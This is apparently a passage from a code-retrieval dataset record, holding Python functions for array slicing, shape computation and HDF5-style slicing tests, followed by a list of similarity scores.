rshape[n], lshape[n] = big, small\n rslices[n], lslices[n] = s_big, s_small\n else:\n rshape[n], lshape[n] = small, big\n rslices[n], lslices[n] = s_small, s_big\n\n return lshape, rshape, tuple(lslices), tuple(rslices)", "def _build_slices(dataset, patch_shape, stride_shape):\n slices = []\n if dataset.ndim == 4:\n in_channels, i_z, i_y, i_x = dataset.shape\n else:\n i_z, i_y, i_x = dataset.shape\n\n k_z, k_y, k_x = patch_shape\n s_z, s_y, s_x = stride_shape\n z_steps = SliceBuilder._gen_indices(i_z, k_z, s_z)\n for z in z_steps:\n y_steps = SliceBuilder._gen_indices(i_y, k_y, s_y)\n for y in y_steps:\n x_steps = SliceBuilder._gen_indices(i_x, k_x, s_x)\n for x in x_steps:\n slice_idx = (\n slice(z, z + k_z),\n slice(y, y + k_y),\n slice(x, x + k_x)\n )\n if dataset.ndim == 4:\n slice_idx = (slice(0, in_channels),) + slice_idx\n slices.append(slice_idx)\n return slices", "def test_slice_other_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[:1]\n assert isinstance(out, np.ndarray)\n assert out.shape == (1,)+shape[1:]", "def make_fwd_slice(shape, slices, reverse=None, cull_second=True):\n if reverse is None:\n reverse = []\n if not isinstance(shape, (list, tuple, 
np.ndarray)):\n shape = [shape]\n if not isinstance(slices, (list, tuple)):\n slices = [slices]\n if not isinstance(reverse, (list, tuple)):\n reverse = [reverse]\n\n newax_inds = [i for i, x in enumerate(slices) if x == np.newaxis]\n shape = list(shape)\n for i in newax_inds:\n shape.insert(i, 1)\n\n # ya know, lets just go through all the dimensions in shape\n # just to be safe and default to an empty slice / no reverse\n slices = slices + [slice(None)] * (len(shape) - len(slices))\n reverse = reverse + [False] * (len(slices) - len(reverse))\n\n first_slc = [slice(None)] * len(slices)\n second_slc = [slice(None, None, 1)] * len(first_slc)\n\n for i, slc, L, rev in izip(count(), slices, shape, reverse):\n if isinstance(slc, slice):\n step = slc.step if slc.step is not None else 1\n start = slc.start if slc.start is not None else 0\n stop = slc.stop if slc.stop is not None else L\n if start < 0:\n start += L\n if stop < 0:\n stop += L\n\n # sanity check the start/stop since we're gunna be playing\n # fast and loose with them\n if start < 0 or stop < 0:\n raise IndexError(\"((start = {0}) or (stop = {1})) < 0\"\n \"\".format(start, stop))\n if start > L or stop > L:\n raise IndexError(\"((start={0}) or (stop={1})) > (L={2})\"\n \"\".format(start, stop, L))\n\n # now do the math of flipping the slice if needed, these branches\n # change start, stop, and step so they can be used to create a new\n # slice below\n if rev:\n if step < 0:\n step = -step\n if slc.start is None:\n start = L - 1\n if slc.stop is None:\n start = L - 1 - start\n stop = None\n else:\n start, stop = L - 1 - start, L - 1 - stop\n else:\n start, stop = L - stop, L - start\n start += ((stop - 1 - start) % step)\n second_slc[i] = slice(None, None, -1)\n elif step < 0:\n step = -step\n if slc.start is None:\n start = L - 1\n\n if slc.stop is None:\n start, stop = 0, start + 1\n start = ((stop - 1 - start) % step)\n else:\n start, stop = stop + 1, start + 1\n start += ((stop - 1 - start) % step)\n\n second_slc[i] = slice(None, None, -1)\n\n # check that our slice is valid\n assert start is None or (0 <= start and start <= L), \\\n \"start (={0}) is outside range\".format(start)\n assert start is None or (0 <= start and start <= L), \\\n \"start (={0}) is outside range\".format(start)\n assert start is None or stop is None or start < stop, \\\n \"bad slice ordering: {0} !< {1}\".format(start, stop)\n assert step > 0\n slc = slice(start, stop, step)\n\n elif isinstance(slc, (int, np.integer)):\n second_slc[i] = None\n if rev:\n slc = (L - 1) - slc\n\n elif slc == np.newaxis:\n second_slc[i] = \"NEWAXIS\"\n\n first_slc[i] = slc\n\n first_slc = [s for s in first_slc if s is not np.newaxis]\n if cull_second:\n second_slc = [s for s in second_slc if s is not None]\n second_slc = [np.newaxis if s == \"NEWAXIS\" else s for s in second_slc]\n return first_slc, second_slc", "def genslices_ndim(ndim, shape):\n iterables = [genslices(shape[n]) for n in range(ndim)]\n yield from product(*iterables)", "def rand_aligned_slices(maxdim=5, maxshape=16):\n ndim = randrange(1, maxdim + 1)\n minshape = 2\n n = randrange(100)\n if n >= 95:\n minshape = 0\n elif n >= 90:\n minshape = 1\n all_random = True if randrange(100) >= 80 else False\n lshape = [0] * ndim\n rshape = [0] * ndim\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n small = randrange(minshape, maxshape + 1)\n big = randrange(minshape, maxshape + 1)\n if big < small:\n big, small = small, big\n if all_random:\n start = randrange(-small, small + 1)\n stop = 
randrange(-small, small + 1)\n step = (1, -1)[randrange(2)] * randrange(1, small + 2)\n s_small = slice(start, stop, step)\n _, _, _, slicelen = slice_indices(s_small, small)\n else:\n slicelen = randrange(1, small + 1) if small > 0 else 0\n s_small = randslice_from_slicelen(slicelen, small)\n s_big = randslice_from_slicelen(slicelen, big)\n if randrange(2) == 0:\n rshape[n], lshape[n] = big, small\n rslices[n], lslices[n] = s_big, s_small\n else:\n rshape[n], lshape[n] = small, big\n rslices[n], lslices[n] = s_small, s_big\n return lshape, rshape, tuple(lslices), tuple(rslices)", "def same_nd(shape, stride, kernel_size):\n\n rshape = []\n for sh, st, sz in zip(shape, stride, kernel_size):\n rshape.append(int(same_x(sh, st, sz)))\n return rshape", "def slice_output_shape(input_shape):\n shape_1 = input_shape[0]\n shape_2 = 80\n shape_3 = input_shape[2]\n return (shape_1, shape_2, shape_3)", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", "def get_slicing_crops(pred_shape, target_shape, pred_ds_factor, real_patch_shape):\n # Compute new left crops:\n # (we do not care about the right crops, because anyway the extra patches are\n # ignored with the option `limit_patches_to`)\n upscaled_pred_shape = [sh * fctr for sh, fctr in zip(pred_shape, pred_ds_factor)]\n\n shape_diff = [orig - trg for orig, trg in zip(target_shape, upscaled_pred_shape)]\n assert all([diff >= 0 for diff in shape_diff]), \"Prediction should be smaller or equal to the targets!\"\n assert all([diff % 2 == 0 for diff in shape_diff])\n padding = [int(diff / 2) for diff in shape_diff]\n\n crop_slice_targets = [slice(None), slice(None)]\n crop_slice_prediction = [slice(None), slice(None)]\n import math\n for dim, pad in enumerate(padding):\n # Consider the patch-padding:\n real_pad = pad - int(real_patch_shape[dim] / 2)\n if real_pad > 0:\n # We should crop targets\n crop_slice_targets.append(slice(real_pad, -real_pad))\n crop_slice_prediction.append(slice(None))\n elif real_pad < 0:\n # We should crop prediction:\n # (use floor to round up, since pad is negative)\n crop_slice_prediction.append(\n slice(-math.floor(real_pad / pred_ds_factor[dim]), math.floor(real_pad / pred_ds_factor[dim])))\n crop_slice_targets.append(slice(None))\n else:\n # No need to crop:\n crop_slice_targets.append(slice(None))\n crop_slice_prediction.append(slice(None))\n\n return tuple(crop_slice_targets), tuple(crop_slice_prediction)", "def _get_slice(segments, shape):\n\n if not (1 <= len(shape) <= 2):\n raise ValueError('Cannot segment array of shape: %s' % str(shape))\n else:\n size = shape[0]\n slice_length = np.ceil(float(size) / segments)\n start_idx = 0\n end_idx = slice_length\n while start_idx < size:\n if len(shape) == 1:\n yield slice(start_idx, end_idx)\n else:\n yield (slice(start_idx, end_idx), slice(None))\n start_idx = end_idx\n end_idx = min(start_idx + slice_length, size)", "def match_shapes(arrs):\n #temp = [(name, np.asarray(a), deg) for name, a, deg in arrs]\n #ndim = max([a.ndim - deg for _, a, deg in arrs])\n\n temp = [a for name, a, deg in arrs]\n for i in range(len(temp)):\n if np.isscalar(temp[i]):\n temp[i] = np.array(temp[i])\n ndim = max([a.ndim - deg for a, (_, _, deg) in zip(temp, arrs)])\n\n prep_arrs = []\n for name, a, deg in arrs:\n if 
np.isscalar(a):\n a = np.asarray(a)\n if a.ndim < deg:\n raise RuntimeError('%s.ndim must be at least %d' % (name, deg))\n if a.ndim < ndim + deg:\n #a = a.reshape((1,) * (ndim + deg - a.ndim) + a.shape)\n slc = (nax,) * (ndim + deg - a.ndim) + (Ellipsis,)\n a = a[slc]\n prep_arrs.append(a)\n\n return prep_arrs", "def convolve_slicer(arr, shape1, shape2, mode, axis):\n\n m, n = shape1[axis], shape2[axis]\n p, q = max(m,n), min(m,n)\n\n if mode == 'full':\n\n # full mode length is m + n - 1\n return arr\n \n if mode == 'same':\n \n # same mode length is max(m, n) centered along axis of arr\n start = (q - 1) // 2\n stop = start + p\n return slice_along_axis(arr, start, stop, axis=axis)\n\n elif mode == 'valid':\n \n # valid mode length is m + n - 1 - 2 * (q-1) centered along axis\n start= q - 1 \n stop = (n + m - 1) - (q - 1)\n return slice_along_axis(arr, start, stop, axis=axis)", "def test_slice_zero_length_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[...]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n out = dset[:]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n if len(shape) > 1:\n out = dset[:, :1]\n assert isinstance(out, np.ndarray)\n assert out.shape[:2] == (0, 1)", "def split_combined_polys(polys, poly_lens, polys_per_mask):\n mask_polys_list = []\n for img_id in range(len(polys)):\n polys_single = polys[img_id]\n polys_lens_single = poly_lens[img_id].tolist()\n polys_per_mask_single = polys_per_mask[img_id].tolist()\n\n split_polys = mmcv.slice_list(polys_single, polys_lens_single)\n mask_polys = mmcv.slice_list(split_polys, polys_per_mask_single)\n mask_polys_list.append(mask_polys)\n return mask_polys_list", "def reshape(x, shape):\n return Reshape(shape)(x)", "def test_slice_zero_length_dimension(self):\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[...]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n out = dset[:]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n if len(shape) > 1:\n out = dset[:, :1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape[:2], (0, 1))", "def gen_split(shape,left=True):\n # Create the splitting tensor\n if left:\n split_shape = (np.prod(shape),)+shape\n else:\n split_shape = shape+(np.prod(shape),)\n split_ten = np.zeros(split_shape)\n # Turn into correct identity\n allinds = [range(i) for i in shape]\n cnt = 0\n for ind in itertools.product(*allinds):\n if left:\n tenind = (cnt,)+tuple(ind)\n else:\n tenind = tuple(ind)+(cnt,)\n split_ten[tenind] = 1.\n cnt += 1\n # Return result\n return split_ten", "def _compute_slice_dim_and_shape(full_shape, slicing):\n\n slice_shape = [0] * len(full_shape)\n slice_dim = None\n for dim, num_slices in enumerate(slicing):\n dim_size = full_shape[dim]\n if num_slices <= 0 or dim_size < num_slices:\n raise ValueError(\"Cannot create %d slices for size %d. 
shape: %s, \"\n \"slicing: %s\" %\n (num_slices, full_shape[dim], full_shape, slicing))\n if num_slices == 1:\n # Not slicing in this dimension.\n slice_shape[dim] = dim_size\n elif slice_dim is not None:\n # We only support slicing along one of the dimensions.\n raise ValueError(\"Can only slice a variable along one dimension: \"\n \"shape: %s, slicing: %s\" % (full_shape, slicing))\n else:\n # Note: We will add any extras onto the last slice, later.\n slice_dim = dim\n slice_shape[dim] = dim_size // num_slices\n\n # Degenerate case: If \"slicing\" was all ones, pretend we are slicing along\n # the first dimension.\n if slice_dim is None:\n slice_dim = 0\n return slice_dim, slice_shape", "def overlaps(self, indices):\n p_indices = []\n shape = []\n\n if not indices:\n return p_indices, shape\n\n for index, (r0, r1), size in zip(indices, self.location, self.shape):\n if isinstance(index, slice):\n stop = size\n if index.stop < r1:\n stop -= r1 - index.stop\n\n start = index.start - r0\n if start < 0:\n start %= index.step # start is now +ve\n\n if start >= stop:\n # This partition does not span the slice\n return None, None\n\n # Still here?\n step = index.step\n index = slice(start, stop, step)\n index_size, rem = divmod(stop - start, step)\n if rem:\n index_size += 1\n\n else:\n\n # Still here?\n index = [i - r0 for i in index if r0 <= i < r1]\n index_size = len(index)\n if index_size == 0:\n return None, None\n elif index_size == 1:\n index = slice(index[0], index[0] + 1)\n else:\n index0 = index[0]\n step = index[1] - index0\n if step > 0:\n start, stop = index0, index[-1] + 1\n elif step < 0:\n start, stop = index0, index[-1] - 1\n if index == list(range(start, stop, step)):\n # Replace the list with a slice object\n if stop < 0:\n stop = None\n index = slice(start, stop, step)\n # --- End: if\n\n p_indices.append(index)\n shape.append(index_size)\n # --- End: for\n\n # Still here? 
Then this partition does span the slice and the\n # elements of this partition specified by p_indices are in the\n # slice.\n return p_indices, shape", "def intersect_slices(s1, s2, array_length=None):\n\n assert array_length is not None or \\\n (s1.start >= 0 and s2.start >= 0 and s1.stop >= 0 and s2.start >= 0)\n\n s1_start = s1.start\n s2_start = s2.start\n s1_stop = s1.stop\n s2_stop = s2.stop\n s1_step = s1.step\n s2_step = s2.step\n\n if s1_step is None:\n s1_step = 1\n if s2_step is None:\n s2_step = 1\n\n assert s1_step > 0 and s2_step > 0\n\n if s1_start < 0:\n s1_start = array_length + s1_start\n if s1_start < 0:\n return slice(0, 0)\n\n if s2_start < 0:\n s2_start = array_length + s2_start\n if s2_start < 0:\n return slice(0, 0)\n\n if s1_stop < 0:\n s1_stop = array_length + s1_stop\n if s1_stop < 0:\n return slice(0, 0)\n\n if s2_stop < 0:\n s2_stop = array_length + s2_stop\n if s2_stop < 0:\n return slice(0, 0)\n\n step = lcm(s1_step, s2_step)\n\n start = max(s1_start, s2_start)\n stop = min(s1_stop, s2_stop)\n\n if stop <= start:\n return slice(0, 0)\n\n s1_offset = start - s1_start\n s2_offset = start - s2_start\n s1_offset_x = int(s1_offset)\n s2_offset_x = int(s2_offset)\n\n if s1_step == s2_step and s1_offset % s1_step != s2_offset % s1_step:\n # slices are mutually exclusive\n return slice(0, 0)\n\n # There is surely a more efficient way to do the following, but\n # it eludes me for the moment\n while s1_offset % s1_step != 0 or s2_offset % s2_step != 0:\n start += 1\n s1_offset += 1\n s2_offset += 1\n if s1_offset % s1_step == s1_offset_x % s1_step and s2_offset % s2_step == s2_offset_x % s2_step:\n # slices are mutually exclusive\n return slice(0, 0)\n\n if step == 1:\n step = None\n\n return slice(start, stop, step)", "def random_split(dataset, lengths):\n if sum(lengths) != len(dataset):\n raise ValueError(\"Sum of input lengths does not equal the length of the input dataset!\")\n\n indices = randperm(sum(lengths))\n return [Subset(dataset, indices[offset - length:offset]) for offset, length in zip(_accumulate(lengths), lengths)]", "def generate_equal_slices(list_to_slice, batch_size):\n\n assert len(list_to_slice) > 1\n\n list_slices = []\n\n sample_size = len(list_to_slice)\n\n for start_i in range(0, sample_size, batch_size):\n end_i = start_i + batch_size\n aslice = list_to_slice[start_i:end_i]\n if len(aslice) < batch_size:\n aslice_rep = aslice * math.ceil(batch_size/len(aslice))\n aslice = aslice_rep[:batch_size]\n\n assert len(aslice) == batch_size\n\n list_slices.append(aslice)\n\n return list_slices", "def merge_slices(s1, s2):\n assert s1._shape[1] == s2._shape[1], \"\"\"The arrays must have the same\n number of columns.\"\"\"\n assert s1._sparse == s2._sparse, \"\"\"A sparse and a dense array cannot\n be merged.\"\"\"\n assert s1._reg_shape == s2._reg_shape, \"\"\"The array regular blocks must\n have the same shape.\"\"\"\n\n len_s1 = s1.shape[0]\n len_s2 = s2.shape[0]\n\n # If s1 or s2 is empty, quickly return the other slice.\n if len_s1 == 0:\n return s2\n if len_s2 == 0:\n return s1\n\n reg_shape = s1._reg_shape\n reg_rows = reg_shape[0]\n\n # Compute the start and end of regular row blocks for s1\n top_rows_s1 = s1._top_left_shape[0]\n reg_rows_start_s1 = top_rows_s1 if top_rows_s1 != reg_rows else 0\n reg_rows_end_s1 = len_s1 - (len_s1 - reg_rows_start_s1) % reg_rows\n\n # Compute the start and end of regular row blocks for s2\n top_rows_s2 = s2._top_left_shape[0]\n reg_rows_start_s2 = top_rows_s2 if top_rows_s2 != reg_rows else 0\n reg_rows_end_s2 
= len_s2 - (len_s2 - reg_rows_start_s2) % reg_rows\n\n # Get arrays with the regular row blocks for s1 and s2\n reg_s1 = s1[reg_rows_start_s1:reg_rows_end_s1]\n reg_s2 = s2[reg_rows_start_s2:reg_rows_end_s2]\n\n # Add the regular row blocks to the list all_blocks\n all_blocks = []\n if reg_s1.shape[0]:\n all_blocks.extend(reg_s1._blocks)\n if reg_s2.shape[0]:\n all_blocks.extend(reg_s2._blocks)\n\n # If there are remaining rows on the top or bottom of s1 and s2, add them\n # to the list extras. These are row blocks with less than reg_rows.\n extras = []\n if reg_rows_start_s1 > 0:\n extras.append(s1[:reg_rows_start_s1])\n if reg_rows_start_s2 > 0:\n extras.append(s1[:reg_rows_start_s2])\n if reg_rows_end_s1 < len_s1:\n extras.append(s1[reg_rows_end_s1:])\n if reg_rows_end_s2 < len_s2:\n extras.append(s2[reg_rows_end_s2:])\n\n # Arrange the rows of the arrays in extras in groups of reg_rows rows,\n # slicing the arrays when necessary. The last group may have less than\n # reg_rows rows.\n groups = []\n current_capacity = 0\n for extra in extras:\n len_extra = extra.shape[0]\n if current_capacity == 0:\n current_capacity = reg_rows\n groups.append([])\n if extra.shape[0] <= current_capacity:\n current_capacity -= extra.shape[0]\n groups[-1].append(extra)\n else:\n groups[-1].append(extra[:current_capacity])\n groups.append([extra[current_capacity:]])\n current_capacity = current_capacity - len_extra + reg_rows\n\n # Merge the row blocks in each group, forming a single row block per group,\n # and add it to the list all blocks.\n for g in groups:\n blocks = []\n for a in g:\n for row_block in a._blocks:\n blocks.append(row_block)\n group_blocks = [object() for _ in range(s1._n_blocks[1])]\n _merge_rows_keeping_cols(blocks, group_blocks)\n all_blocks.append(group_blocks)\n\n # Now all_blocks contains all the rows of s1 and s2 in an appropiate\n # arrangement to create the merged array.\n return Array(blocks=all_blocks, top_left_shape=reg_shape,\n reg_shape=reg_shape, shape=(len_s1 + len_s2, s1.shape[1]),\n sparse=s1._sparse)", "def get_shapes(imshp=(1, 1), kshp=(1, 1), subsample=(1, 1),\r\n img_stride=(1, 1), kern_stride=(1, 1)):\r\n return [\r\n #stack only\r\n ((1, 2) + imshp, (1, 2) + kshp, subsample, img_stride, kern_stride),\r\n #batch only\r\n ((3, 1) + imshp, (1, 1) + kshp, subsample, img_stride, kern_stride),\r\n #nkern only\r\n ((1, 1) + imshp, (2, 1) + kshp, subsample, img_stride, kern_stride),\r\n #batch and nkern\r\n ((3, 1) + imshp, (2, 1) + kshp, subsample, img_stride, kern_stride),\r\n #batch and stack\r\n ((3, 2) + imshp, (1, 2) + kshp, subsample, img_stride, kern_stride),\r\n #stack and nkern\r\n ((1, 2) + imshp, (2, 2) + kshp, subsample, img_stride, kern_stride),\r\n #batch, nkern and stack\r\n ((2, 2) + imshp, (2, 2) + kshp, subsample, img_stride, kern_stride),\r\n #batch, nkern and stack\r\n ((3, 2) + imshp, (4, 2) + kshp, subsample, img_stride, kern_stride)\r\n ]" ]
[ "0.6905628", "0.65749097", "0.6485385", "0.6485385", "0.6428866", "0.64170295", "0.64149487", "0.6344559", "0.6343766", "0.6329222", "0.62940896", "0.6255896", "0.62288624", "0.6182799", "0.59876955", "0.5903534", "0.58359647", "0.5818925", "0.5786385", "0.5780439", "0.5728248", "0.5711932", "0.5707022", "0.56921947", "0.5662671", "0.5659566", "0.5657923", "0.5649833", "0.5634276", "0.5630171" ]
0.6896135
1
Return a list of random items for structure 't' with format 'fmtchar'.
def randitems_from_structure(fmt, t):
    memlen, itemsize, _, _, _, _ = t
    return gen_items(memlen//itemsize, '#'+fmt, 'numpy')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def randitems_from_structure(fmt, t):\n memlen, itemsize, _, _, _, _ = t\n return gen_items(memlen // itemsize, '#' + fmt, 'numpy')", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def gen_item(fmt, obj):\n mode, chars = fmt.split('#')\n x = []\n for c in chars:\n x.append(randrange_fmt(mode, c, obj))\n return x[0] if len(x) == 1 else tuple(x)", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def randitems(n, obj='ndarray', mode=None, char=None):\n if mode is None:\n mode = choice(cap[obj][MODE])\n if char is None:\n char = choice(tuple(fmtdict[mode]))\n multiplier = choice(cap[obj][MULT])\n fmt = mode + '#' + char * int(multiplier if multiplier else 1)\n items = gen_items(n, fmt, obj)\n item = gen_item(fmt, obj)\n fmt = mode.strip('amb') + multiplier + char\n return fmt, items, item", "def lf():\n return random.sample(font_list, 25)", "def gen_items(n, fmt, obj):\n if n == 0:\n return gen_item(fmt, obj)\n lst = [0] * n\n for i in range(n):\n lst[i] = gen_item(fmt, obj)\n return lst", "def gen_items(n, fmt, obj):\n if n == 0:\n return gen_item(fmt, obj)\n lst = [0] * n\n for i in range(n):\n lst[i] = gen_item(fmt, obj)\n return lst", "def sample(f, n):\n entries = list(SeqIO.parse(f, 'fasta'))\n for seqnum in range(n):\n loc = round(random.uniform(0, len(entries) - 1))\n entry = entries[loc] # get index of randomly-selected FASTA entry\n header = '>' + str(seqnum + 1) + '-' + entry.description # header\n print(header + '\\n' + str(entry.seq)) # print-out entire entry", "def randrange_fmt(mode, char, obj):\n x = randrange(*fmtdict[mode][char])\n if char == 'c':\n x = bytes([x])\n if obj == 'numpy' and x == b'\\x00':\n x = b'\\x01'\n if char == '?':\n x = bool(x)\n if char == 'f' or char == 'd':\n x = struct.pack(char, x)\n x = struct.unpack(char, x)[0]\n return x", "def randrange_fmt(mode, char, obj):\n x = randrange(*fmtdict[mode][char])\n if char == 'c':\n x = bytes([x])\n if obj == 'numpy' and x == b'\\x00':\n # http://projects.scipy.org/numpy/ticket/1925\n x = b'\\x01'\n if char == '?':\n x = bool(x)\n if char == 'f' or char == 'd':\n x = struct.pack(char, x)\n x = struct.unpack(char, x)[0]\n return x", "def random_entry(): \n\n files = list_entries()\n return random.choice(files)", "def generate_grid():\n field = []\n three_lst = []\n for three_let in range(0, 3):\n three_lst = []\n for i in range(0, 3):\n three_lst.append(chr(random.randint(97, 122)))\n field.append(three_lst)\n return field", "def fill(l):\n s = ''\n for _ in range(0, l):\n s += \"ACGT\"[randint(0,3)]\n return s", "def make_text(chains, n):\n\n first_key = random.choice(chains.keys(n))\n first_key_values = chains[first_key]\n third_word = random.choice(first_key_values)\n temp_list = [first_key[0], first_key[1], third_word]\n # for item in temp_list\n new_key = (first_key[1], third_word)\n\n while True:\n try:\n new_value = random.choice(chains[new_key])\n temp_list.append(new_value)\n new_first_word = new_key[1]\n new_key = (new_first_word, new_value)\n except KeyError:\n break\n\n text = \" \".join(temp_list)\n return text", "def 
test_nothing_fits():\n freetimes, _ = free([], 9, 0, 17, 0, day_range, 600)\n fmt_freetime = output_format(freetimes)\n for i in fmt_freetime:\n print(i)\n assert fmt_freetime == []", "def random_names(num):\n return tuple(\n sorted(itertools.islice(utils.iunique(utils.random_strings(1, 3)), num))\n )", "def create_tag_list(faker_obj, num=10):\n fake = faker_obj\n return fake.words(nb=num)", "def random_teampreview(self, battle: AbstractBattle) -> str:\n members = list(range(1, len(battle.team) + 1))\n random.shuffle(members)\n return \"/team \" + \"\".join([str(c) for c in members])", "def formatter(t: tuple):\n s = 'The {} numbers are: ' + '{}, '*(len(t)-1) + '{}'\n return s.format(len(t),*t)", "def generatoze(b):\r\n l = []\r\n for i in range(b):\r\n k = random.randint(0, 100)\r\n l.append(k)\r\n return l", "def generate(count):\n lst = []\n with open('data.txt', 'w+') as f:\n for i in range(0, count):\n st = str(random.random())\n f.write(st+\"\\n\")\n lst.append(st)\n return lst", "def get_random(number):\n s = ''\n for i in xrange(number):\n s = s + str(random.choice(field))\n return s", "def test_multi_template():\n data = []\n data.extend([\"{}_data.json\".format(i) for i in range(50)])\n data.extend([\"{}_log.csv\".format(i) for i in range(50)])\n data.extend([\"filename_{}.py\".format(i) for i in range(50)])\n data.extend([\"stuff_{}.py\".format(i) for i in range(50)])\n temp = data[:]\n random.shuffle(temp)\n assert data == sort(temp)", "def add_random_fields(smali_line):\n for _ in range(u.random_nop_interval()):\n print re.sub(r':', u.get_random(True, 32) + ':', smali_line), # Append", "def getformat(self) -> List[str]:\r\n\r\n if isinstance(self.listaTipos, list) is False:\r\n raise TypeError(f\"{self.listaTipos} has to be a list({type(self.listaTipos)})\")\r\n if len(self.listaTipos) != 10:\r\n raise ValueError(f\"{self.listaTipos} needs to have 10 elements ({len(self.listaTipos)})\")\r\n\r\n saida = []\r\n for _ in self.listaTipos:\r\n saida.append(f\"{_}\")\r\n return saida", "def get_all():\n blocks = []\n for key, block in BLOCKS.iteritems():\n if len(block) != 3:\n raise BlockFormatError\n x, y, z = block\n blocks.append('%s=%.1f,%.1f,%.1f' % (key, x, y, z))\n return '|'.join(blocks)", "def generate_grid() -> List[List[str]]:\r\n list_of_game_letters = []\r\n timed_list = []\r\n letters = [j for j in string.ascii_lowercase]\r\n for i in range(9):\r\n timed_list.append(random.choice(letters))\r\n if len(timed_list) == 3:\r\n list_of_game_letters.append(timed_list)\r\n timed_list = []\r\n return list_of_game_letters", "def generate_a_values() -> List[str]:\n return [\"A_1\", \"A_2\", \"A_3\"]", "def genCharGroup(self):\n alphabet = list('abcdefghijklmnopqrstuvwxyz') #Creates a list of all the alphabet characters\n group = []\n count = 0\n while count != 3: #While the loop total does not equal 3\n i = random.choice(alphabet) #Make a random choice\n alphabet.remove(i) #Remove it from the alphabet\n group.append(i) #And add it to the group array\n count += 1 #Add one to the loop total\n return str(''.join(group)) #Return the string of 3 characters to the user" ]
[ "0.75925416", "0.6998413", "0.6998413", "0.61594206", "0.61594206", "0.5678781", "0.55998796", "0.55998796", "0.5551217", "0.55419385", "0.5459458", "0.5367428", "0.53579396", "0.53160495", "0.5218872", "0.51369077", "0.5077376", "0.5070219", "0.5048697", "0.50483674", "0.50316584", "0.5026513", "0.50077575", "0.4998603", "0.49602845", "0.4956614", "0.49315235", "0.4924074", "0.49030784", "0.48991337" ]
0.7437101
1
Interpret the raw memory of 'exporter' as a list of items with size 'itemsize'. If shape=None, the new structure is assumed to be 1-D with n * itemsize = bytelen. If shape is given, the usual constraint for contiguous arrays prod(shape) * itemsize = bytelen applies. On success, return (items, shape). If the constraints cannot be met, return (None, None). If a chunk of bytes is interpreted as NaN as a result of float conversion, return ('nan', None).
def cast_items(exporter, fmt, itemsize, shape=None):
    bytelen = exporter.nbytes
    if shape:
        if prod(shape) * itemsize != bytelen:
            return None, shape
    elif shape == []:
        if exporter.ndim == 0 or itemsize != bytelen:
            return None, shape
    else:
        n, r = divmod(bytelen, itemsize)
        shape = [n]
        if r != 0:
            return None, shape
    mem = exporter.tobytes()
    byteitems = [mem[i:i+itemsize] for i in range(0, len(mem), itemsize)]
    items = []
    for v in byteitems:
        item = struct.unpack(fmt, v)[0]
        if item != item:
            return 'nan', shape
        items.append(item)
    return (items, shape) if shape != [] else (items[0], shape)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cast_items(exporter, fmt, itemsize, shape=None):\n bytelen = exporter.nbytes\n if shape:\n if prod(shape) * itemsize != bytelen:\n return None, shape\n elif shape == []:\n if exporter.ndim == 0 or itemsize != bytelen:\n return None, shape\n else:\n n, r = divmod(bytelen, itemsize)\n shape = [n]\n if r != 0:\n return None, shape\n mem = exporter.tobytes()\n byteitems = [mem[i:i + itemsize] for i in range(0, len(mem), itemsize)]\n items = []\n for v in byteitems:\n item = struct.unpack(fmt, v)[0]\n if item != item:\n return 'nan', shape\n items.append(item)\n return (items, shape) if shape != [] else (items[0], shape)", "def to_array(self, dtype=float):\n\n resource_result = resources.assignable_array(self.shape, dtype)\n assignable, allowable, required = resource_result\n\n if not assignable:\n a, b = np.round(np.array([required, allowable]) / 1e9, 1)\n msg = 'Producer will consume {} GB but only {} GB are available'\n raise MemoryError(msg.format(a, b))\n\n return np.concatenate(list(self), axis=self.axis)", "def read_record(self, *dtypes, **kwargs):\n dtype = kwargs.pop('dtype', None)\n if kwargs:\n raise ValueError(\"Unknown keyword arguments {}\".format(tuple(kwargs.keys())))\n\n if dtype is not None:\n dtypes = dtypes + (dtype,)\n elif not dtypes:\n raise ValueError('Must specify at least one dtype')\n\n first_size = self._read_size(eof_ok=True)\n\n dtypes = tuple(np.dtype(dtype) for dtype in dtypes)\n block_size = sum(dtype.itemsize for dtype in dtypes)\n\n num_blocks, remainder = divmod(first_size, block_size)\n if remainder != 0:\n raise ValueError('Size obtained ({0}) is not a multiple of the '\n 'dtypes given ({1}).'.format(first_size, block_size))\n\n if len(dtypes) != 1 and first_size != block_size:\n # Fortran does not write mixed type array items in interleaved order,\n # and it's not possible to guess the sizes of the arrays that were written.\n # The user must specify the exact sizes of each of the arrays.\n raise ValueError('Size obtained ({0}) does not match with the expected '\n 'size ({1}) of multi-item record'.format(first_size, 